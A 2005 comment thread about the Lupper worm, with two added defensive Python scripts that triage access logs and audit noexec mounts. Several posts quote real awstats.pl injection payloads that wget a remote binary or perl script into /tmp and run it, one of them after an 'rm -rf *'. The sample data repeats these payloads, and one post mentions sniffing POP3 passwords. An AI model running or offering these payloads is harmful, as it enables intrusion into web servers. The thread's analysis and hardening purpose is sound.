Linux Lupper.Worm In the Wild
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm, which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious HTTP requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Next is a collection of messages saying that it is the fault of the system administrators and not a problem of the Linux distributions.
p.s. BURN KARMA BURN!
Ubuntu is an African word meaning 'I can't configure Debian'
Second, how do you remove it? Quoth the page:
Seems kind of wrong to name it exclusively a linux problem.
Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!
We must make an effort to get infected?
...then it's a PHP/*nix worm, not Linux specifically.
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
The target has to be standing on one foot, and it needs to be the third Wednesday of the month in February.
Really, c'mon now.. this gets news? OK, bravo.. a Linux worm.. take away the fact that it's really a web vulnerability that seems to take advantage of a "shell" and it could be a Solaris/IRIX/AIX/OpenServer/BSD worm as well..
But for the smear campaign, let's just call it the Linux worm to stir up the zealots.
The road between democracy and tyranny is paved with secrecy in the name of security.
...Linux is more and more popular with corporations holding valuable and important data.
;)
Success is a double-edged sword.
So it's just the name of the worm or does anyone seriously think this is a Linux-worm? It's a web-server worm - nothing more than that!
psyeye
All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.
According to http://searchsecurity.techtarget.com/qna/0,289202,sid14_gci955041,00.html, this worm started in 2002... or am I mistaken?
"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
Paraphrased from the virus description:
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
Paraphrased from the virus description of most MSFT worms:
IF you run an MSFT operating system
AND you haven't reformatted your HDD in the last hour
THEN it's time to pucker up and kiss the sucker goodbye..
-GenTimJS
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...
which in practice means that your admin died a couple of years ago but was never replaced.
May Peace Prevail On Earth
So here is some, shamelessly cribbed from eWeek. The worm actually attempts to attack three different web services:
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only that "most" have fixes - more info, anyone?
Using plain ol' text since 1968
I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
For 60 hits.
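The log excerpt above (and the similar awstats.pl lines other posters quote further down) shows the two request shapes worth alerting on: a GET to awstats.pl whose configdir= value is a shell pipeline wrapped in "|", and POSTs to anything ending in xmlrpc.php. The following is an added example for this thread, not code from the original page or from McAfee, Symantec or ISC. It parses combined-format access-log lines, URL-decodes the injected pipeline into its stages (cd, wget, chmod, ./lupii) so a responder can read the dropper without squinting at %2e escapes, and pulls out the download hosts. The sample lines are constructed to match the posted format; 192.0.2.10, 198.51.100.7 and dropper.example.net are documentation addresses, not the real ones in the thread.

```python
"""Triage Apache access-log lines for Lupper-style probes (added example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Combined-log prefix: client ident user [timestamp] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A stage that pulls the second-stage payload from the network.
FETCH_RE = re.compile(r'^(?:wget|curl|fetch|lynx|ftp)\b')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

SAMPLE_LOG = [  # constructed, shaped like the lines quoted in the thread
    '192.0.2.10 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;'
    'cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%20198%2e51'
    '%2e100%2e7;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.10 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;'
    'rm%20-rf%20*;killall%20-9%20perl;wget%20dropper.example.net/a.txt;perl%20a.txt;echo%20;echo| '
    'HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '192.0.2.10 - - [04/Nov/2005:15:10:20 -0700] "GET /cgi-bin/awstats.pl?config=www.example.com '
    'HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.10 - - [04/Nov/2005:15:10:33 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
]


def awstats_payload(path: str) -> Optional[str]:
    """Decoded pipeline if ``path`` is an awstats configdir injection, else None.

    The attack hands configdir a value starting with '|': awstats builds a
    config filename from it, and a leading pipe turns that open into a
    command pipe (the bug behind CVE-2005-0116).  A plain configdir is ignored.
    """
    m = re.match(r'^[^?]*/awstats\.pl\?(.*)$', path)
    if not m:
        return None
    for param in m.group(1).split('&'):
        name, _, value = param.partition('=')
        if name == 'configdir' and value.startswith('|'):
            # One decode only: the log keeps the raw %xx escapes the client sent.
            return unquote(value).strip('|')
    return None


def classify(line: str) -> Optional[Dict]:
    """Map one log line to a finding, or None if it is not a Lupper-style probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, path = m.group('method'), m.group('path')
    base = {'client': m.group('client'), 'ts': m.group('ts'),
            'status': int(m.group('status')), 'path': path}
    payload = awstats_payload(path)
    if payload is not None:
        stages = [s.strip() for s in payload.split(';') if s.strip()]
        return dict(base, kind='awstats-configdir-rce', stages=stages,
                    fetches=[s for s in stages if FETCH_RE.match(s)],
                    hosts=sorted(set(IPV4_RE.findall(payload))))
    if method == 'POST' and path.split('?', 1)[0].endswith('xmlrpc.php'):
        return dict(base, kind='xmlrpc-probe', stages=[], fetches=[], hosts=[])
    return None


def triage(lines: List[str]) -> List[Dict]:
    """Findings for every probe in ``lines``, in log order."""
    return [f for f in map(classify, lines) if f is not None]


def needs_host_triage(finding: Dict) -> bool:
    """404/401 means the script was absent or gated; a 200 on an injection
    means the script ran the request and the host itself needs a look."""
    return finding['kind'] == 'awstats-configdir-rce' and finding['status'] == 200


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f['ts'], f['client'], f['kind'], f['status'], f['fetches'], f['hosts'])
```

On a real box feed it `open('/var/log/apache2/access.log')` line by line; the useful outputs are the `hosts`/`fetches` fields (what to block at the egress firewall and what to look for in /tmp) and the status code, since the scanner in the posted excerpt got 404s and a 401, which is why the poster saw sixty probes and no infection.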
Linux has a huge market share in the server market, idiot.
It's the AAPL fanboys you have to worry about hereabouts on Slashdot: they are all moderators and a re-up on quality crack just came through.
I doubt I'll have the libraries required to run this worm.
Whichever AV company it was that put out this release, it clearly isn't meant for anyone who's ever used *nix. This message is aimed at potential corporate *nix adopters for whom the lack of viruses might have been a strong selling point. I'm willing to put serious money that there's some lobby cash behind this. This is just like Bush's war - no one with a brain believes it's right, but the majority without the brains do, and that's all that's needed. It's disgusting.
An old-timer with old-timey ideas.
http://vil.nai.com/vil/RateThisPage.asp
Let McAfee know how well they're trolling.
McAfee sucks for real info; look at Symantec or at my summary. In short: update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated, though.
My wife's sketchblog Blob[p]: Gastrono-me
It's a Linux worm? Riiiiiiight.... I wonder who originally raised this with McAfee.
Symantec has a description page with more coverage at http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html
including links to XML-RPC PHP1.x library vulnerabilities used by this malware.
This worm is also known as Linux.Plupii and Linux/Lupper.A too.
Internet Storm Center has a lot of technical information at their
http://isc.sans.org/diary.php?storyid=823
Security Focus eWeek CNet
One line blog. I hear that they're called Twitters now.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
In the distros I've used, the user has to explicitly choose to have a web server installed. Even after that, the user's probably going to have to explicitly choose to install PHP.
"...today consumers have been conditioned to think of beer when they see a bullfrog..."
Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.
It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.
Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.
Javascript + Nintendo DSi = DSiCade
a decent description can be found here http://isc.sans.org/diary.php?storyid=823
This is all I have to say:
http://www.gotwavs.com/0078546128/MP3S/TV_Shows/Simpsons/haha.mp3
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable PHP or CGI script. I don't think many Linux systems ship in this configuration. The reason why this worm exists is the wide deployment of Linux HTTP servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
I already have tcpflow -c port 110 |grep -i pass running in a spare VC. Perhaps now I ought to have tcpflow -c port 80 running in another spare VC at all times, just in case. But I'm going to run out of VCs soon!
According to McAfee it is: It is a modified derivative of the Linux/Slapper ...
And according to a 2002 CERT advisory, the Slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architecture.
Surprisingly there seems to be no mention of it at apache.org, which leads me to think it's pretty benign and not widespread. I could be wrong.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(
Web server running by default? Debian doesn't do that. Apache isn't even installed by default. PHP is a separate install from Apache. This worm appears to be a problem with PHP, not Linux. Linux is just a kernel. If distros have Apache/PHP up and running by default, that is not good, but it's wrong to blame Linux for it when the kernel isn't even remotely involved in the vulnerability.
That's Gnu/Linux worm to you, you insensitive clod!
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
1. don't permit external shell access through your www accounts. Make all your www accounts' shell /usr/bin/false. I realize that some people need CLI access but it should be severely limited in its functions and only used by those who have a real need.
2. don't permit PHP/CGI scripts that are exploitable. Okay, that is a broad general statement; however, there are well known malicious scripts and well known exploitable scripts. Don't allow them. And certainly don't allow them if CLI access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL
Politics is Treachery, Religion is Brainwashing
Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.
Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.
From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.
Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.
Unless I misunderstand the article and comments, it seems that
Safety of Linux user who screws up >> MS user who does everything right
Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.
/. bug #926803 - Why I can post.
sounds to me like an apache with php problem.
I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?
sounds to me like a new version of the old formmail.pl problem.
Why read the article when I can just make up a snap judgement?
Set up a cron to run at 1 minute intervals to rm -rf /tmp/lupii
Quite simple really.
Content Management System: A pretentious way of saying "text editor."
True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(
I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.
What's really interesting, however, is the fact that the worm is very similar to the Slapper worm. The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?
Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.
No one enables it though, I'm just being a smartass.
Nihil Illegitemi Carborvndvm
Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.
With that said, my writeup of the worm is here:
http://www.lurhq.com/slapperv2.html
Includes some previously unreleased facts about who wrote most of the code recycled in Slapper and in Lupper.
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and execute
It's quite obvious that this is a real security malpractice. Even if someone allows external shell commands from the web server, they usually limit access to this kind of resource.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
AFAIK, most distros let you choose which services will be installed, so its really up to user.
The Linux webserver would not be vunerable any way, since it does not support PHP.
All signs point to Linux having anywhere from the same market share as Macs up to 3 times the market share of Macs, particularly if you take into account web servers, which would not show up in places like traditional web stats because web servers don't browse web sites; same thing for HPCs. Also, most Linux machines are converted Wintel boxes, meaning that as far as sales stats go, Windows makes out really well. Take into account that a lot of Linux boxes are old as well as new, meaning that a lot of people who run Linux often run more than one Linux box, some of which may be a decade or so old (or much older in some cases). The average Wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a Linux box today and a Windows box, in 6 years after the first Wintel box is replaced, Microsoft will have 2 "points" and Linux will have 1 even though there is still 1 Linux box and 1 Wintel box running. Now if that Linux box originally was a Windows box, as it is in most cases, then Microsoft would have 3 "points" and Linux none.
Apple often uses sales figures to make their market share appear larger than it is; those numbers are not accurate and highly biased against Linux. But as far as your little rant goes, this is an exploit in PHP and only PHP. But it is even more specific than that: you must have a very specific configuration which pretty much allows anyone to own your machine. This worm doesn't use an exploit, it uses the stupidity of people who configure machines for convenience rather than security. It's akin to leaving the door to my house not only unlocked, but wide open because I didn't feel like being inconvenienced by opening it every day. I've never heard of a box being configured the way the article describes, so this is indeed a rare occurrence.
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes. Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages. If you look at Fedora's page in secunia you'll see that its advisories include updates for Mozilla, Squid, Wget, Abiword and every other package. Considering that one project has the burden of having to report and patch so many packages, you would expect the number to be much higher. Looks like linux is still kicking both Microsoft's and Apple's ass as far as security goes.
Regards,
Steve
Not EXACTLY a *nix worm, but rather a PHP hole; the executable can only be run on a *nix platform, however, so the PHP EXPLOIT goes for all platforms with PHP and unpatched scripts, but the executable the worm uploads and executes is most likely a shell script or *nix executable, SO if the creator wanted he/she COULD have it check what OS the server is running and upload/exec an OS-specific binary.
NO~, I read Slashdot because I think it's stupid.....
If you want to see a total lack of security, don't look at MS. Just post something derogatory of Linux, and watch the geeks line up to find excuses. I've never seen so much insecurity in my life. Posting anonymously because they will now take their insecurity out on me, even though it's not my fault they're incapable of accepting criticism.
because BSD is confirmed dead.'
Rich And Stupid is not so bad as Working For Rich And Stupid.
The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
What about:
The reason why this worm exists is the wide deployment of Windows desktops with this specific vulnerability. There just aren't many Linux desktops out there to bother with them.
Sure, it lacks the first sentence. But the hive-mind here does not like that argument.
...as a new distro sounds catchy, doesn't it?
one more thing: according to the not-very-fine article, the exploit requires one of the following ports listening: UDP 7111, UDP 7222.
So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
I checked my logs and found the following:
[06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
"according to MS" -> "According to MS when he's interested in not being accused of being a monopoly".
Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the IE COM thingy (desktop background, HTML help, explorer.exe's web view, Media Player), which is good, but that doesn't mean it can't be removed (furthermore, IE design is ugly; someone can explain why they don't have a common "image format" COM/OLE/whatever object that desktop background can use instead of using IE as "kitchen sink").
When Microsoft says "tightly integrate", it means "OMG! If we remove IE people won't be able to use a jpg as background and won't be able to read chm help!", but it doesn't mean it can't be removed if they wanted, like if they couldn't move the .chm help to another format. Of course, since lawyers know nothing about computers and money in America's justice system matters so much, it has not been hard for Microsoft to convince lawyers that IE can't be separated from Windows.
Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount /tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more aggressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc.), you can make it so the web server needs to have no egress *at all* except via the services on the other Xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
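Item 2 in the post above (mount /tmp and every other script-writable directory noexec) is the control that directly breaks the dropper chain quoted earlier in the thread (cd /tmp; wget ...; chmod +x lupii; ./lupii). The following is an added example, not code from the thread or from any project: it parses /proc/mounts-formatted text, resolves each writable directory to the mount that actually holds it (longest-prefix match, so /var/tmp is correctly judged by /var's options, not /'s), and reports which ones still allow exec. The mount table and the list of writable directories are constructed assumptions about a typical layout; on a live host pass `open('/proc/mounts').read()` and the directories your CGI/PHP user can write to.

```python
"""Audit script-writable directories for the noexec mount option (added example)."""
from typing import Dict, List, Optional, Set, Tuple

SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
/dev/sda3 /var ext3 rw 0 0
/dev/sdb1 /var/www/uploads ext3 rw,nosuid,noexec,nodev 0 0
"""  # constructed /proc/mounts content

# Assumed set of directories the web-server user can write to.
WRITABLE_DIRS = ['/tmp', '/var/tmp', '/var/www/uploads', '/var/lib/php/sessions']


def parse_mounts(text: str) -> List[Tuple[str, Set[str]]]:
    """(mountpoint, option-set) pairs; /proc/mounts writes a space in a path as \\040."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            mounts.append((fields[1].replace('\\040', ' '), set(fields[3].split(','))))
    return mounts


def mount_for(path: str, mounts: List[Tuple[str, Set[str]]]) -> Optional[Tuple[str, Set[str]]]:
    """The longest mountpoint that is a prefix of ``path`` on a path boundary."""
    best = None
    for mp, opts in mounts:
        if path == mp or path.startswith(mp.rstrip('/') + '/'):
            if best is None or len(mp) > len(best[0]):
                best = (mp, opts)
    return best


def audit(mounts_text: str, writable_dirs: List[str]) -> Dict[str, Dict]:
    """For each writable dir: its mount and whether noexec/nosuid/nodev are set."""
    mounts = parse_mounts(mounts_text)
    findings = {}
    for d in writable_dirs:
        hit = mount_for(d, mounts)
        if hit is None:
            continue
        mp, opts = hit
        findings[d] = {'mount': mp, 'noexec': 'noexec' in opts,
                       'nosuid': 'nosuid' in opts, 'nodev': 'nodev' in opts}
    return findings


def remediation(findings: Dict[str, Dict]) -> List[str]:
    """One action per dir that still allows exec.

    Remount only when the dir is its own mountpoint: remounting a shared
    parent such as /var noexec breaks package maintainer scripts and
    daemons that live there, so those dirs get a dedicated mount instead.
    """
    actions = []
    for d, f in findings.items():
        if f['noexec']:
            continue
        if f['mount'] == d:
            actions.append(f'mount -o remount,noexec,nosuid,nodev {d}')
        else:
            actions.append(f'{d} lives on {f["mount"]}; give it a dedicated noexec mount '
                           f'(tmpfs or bind mount) instead of remounting {f["mount"]}')
    return actions


if __name__ == '__main__':
    for d, f in audit(SAMPLE_MOUNTS, WRITABLE_DIRS).items():
        print(f'{d:25} on {f["mount"]:18} noexec={f["noexec"]}')
    for action in remediation(audit(SAMPLE_MOUNTS, WRITABLE_DIRS)):
        print(action)
```

A remount only lasts until reboot; make it permanent by adding the same options to the /etc/fstab entry. Note the limit the poster alludes to with "there are ways around this": noexec stops `chmod +x lupii; ./lupii`, but the second dropper variant quoted in this thread runs `perl a.txt`, and an interpreter reading a script from /tmp is unaffected. That is why items 1 (no wget for the web user) and 4 (egress filtering) belong alongside it rather than instead of it.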
Oolite: Elite-like game. For Mac, Linux and Windows
It's not quite lunch, it's not quite supper; let's call it lupper!
Who the hell would do such a thing?
All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs.
:-)
But you'd need to do the same for Macs. Not that I'm saying that Apple is selling more X-Serve Units than Linux installs out there, but the figures for Macs won't show up in the same way that the Linux figures don't show up. It's especially important not to discount Macs as the WebObjects platform is very popular.
Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running.
I don't really buy this argument. Most Linux users I've seen reinstall their system for every major update, which tends to come more often than Windows. This is something of a requirement as software support isn't as long lasting on Linux as it is on Windows. i.e. Many developers make a conscious effort to support machines going all the way back to Win98. Linux developers OTOH tend to target the latest GLIBC, thus requiring that the user churn through new installations at a fairly good clip. BSD machines seem to have a bit longer lifespan, but they also suffer from upgrade-or-die-itis. In the case of FreeBSD, however, the system is designed to be easily upgraded via a system recompile. (Which amazingly tends not to break things.)
But as far as your little rant goes, this is an exploit in php and only php.
Incorrect. It's an exploit against the AWStats CGI script and the PHP XML-RPC APIs. Apparently it can also exploit WebHints. (Whatever that is.)
But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine.
It is a very common configuration. Hundreds of inexpensive web hosts offer AWStats, and many personal web servers run it to track traffic. There are a LOT of people who are vulnerable to this exploit. Especially since people think of AWStats as being something hidden that only they can see. Why would they upgrade?
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes.
What's interesting though is the exploits themselves. Security experts have to really work to find an exploit, and most of the ones they find are impossible to actually exploit under any normal circumstances. e.g. If you check the link you provided, you'll notice how many say "local exploit" on them. As in, you need direct access to the machine before it can be exploited. Under Windows, already having access to the machine is the end of the world unless the user has explicitly locked things down. Under Linux, it depends on the quality of the security configuration. A smart admin would be using SUDO and time-lock screensavers. Not all systems are configured this way, however.
Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages.
That's a non-argument. Macs do everything the users want them to do and yet remain secure. That's the key point. Sometimes less is more.
Thank you for the well reasoned argument.
well its a good thing morons don't admin Linux servers.. because if it was anything like Windows, then this worm could have us in for a whole world of hurt..
*plays the Apogee theme song music*
Linux has a smaller market share than Mac OS X, yet it's still getting targeted by virus writers?
... just so you don't need to feel left out. But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-Windows users on a weekly basis (maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
- People switching to a Mac won't need their products
- People running linux won't need their products
- The 800-lb - oops - 1600 lb gorilla in the Window marketspace - Microsoft - is coming out with their own antivirus
If you were in their situation, what would you do?
So wait, you are saying that the worm brings Linux and BSD systems into existence? That is amazing, and quite cool if you ask me!
Ohhhh, you meant "affect", not "effect". Someone attempting to be pedantic should choose their words carefully.
My beliefs do not require that you agree with them.
I'm a Windows admin and noticed something really funny. When a virus comes out, one of the first pieces of information you get is which platforms are vulnerable and under what conditions. Look at the difference between a Linux worm and a Windows one.
Linux:
Linux running webservers, *IF* the target server is running one of the vulnerable scripts, and *IF* it has a specific url, and *IF* it is configured to permit external shell commands, and *IF* it is set to remote file download in the PHP/CGI environment, *THEN MAYBE* a copy of the worm could be downloaded and executed.
Windows:
This virus affects Win 3.1, Win95A, Win95B, Win95C, Win98, Win98SE, Win2000.....
If you are a sysadmin who knows what you are doing, this worm would not affect you.
Let's look at this logically.
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
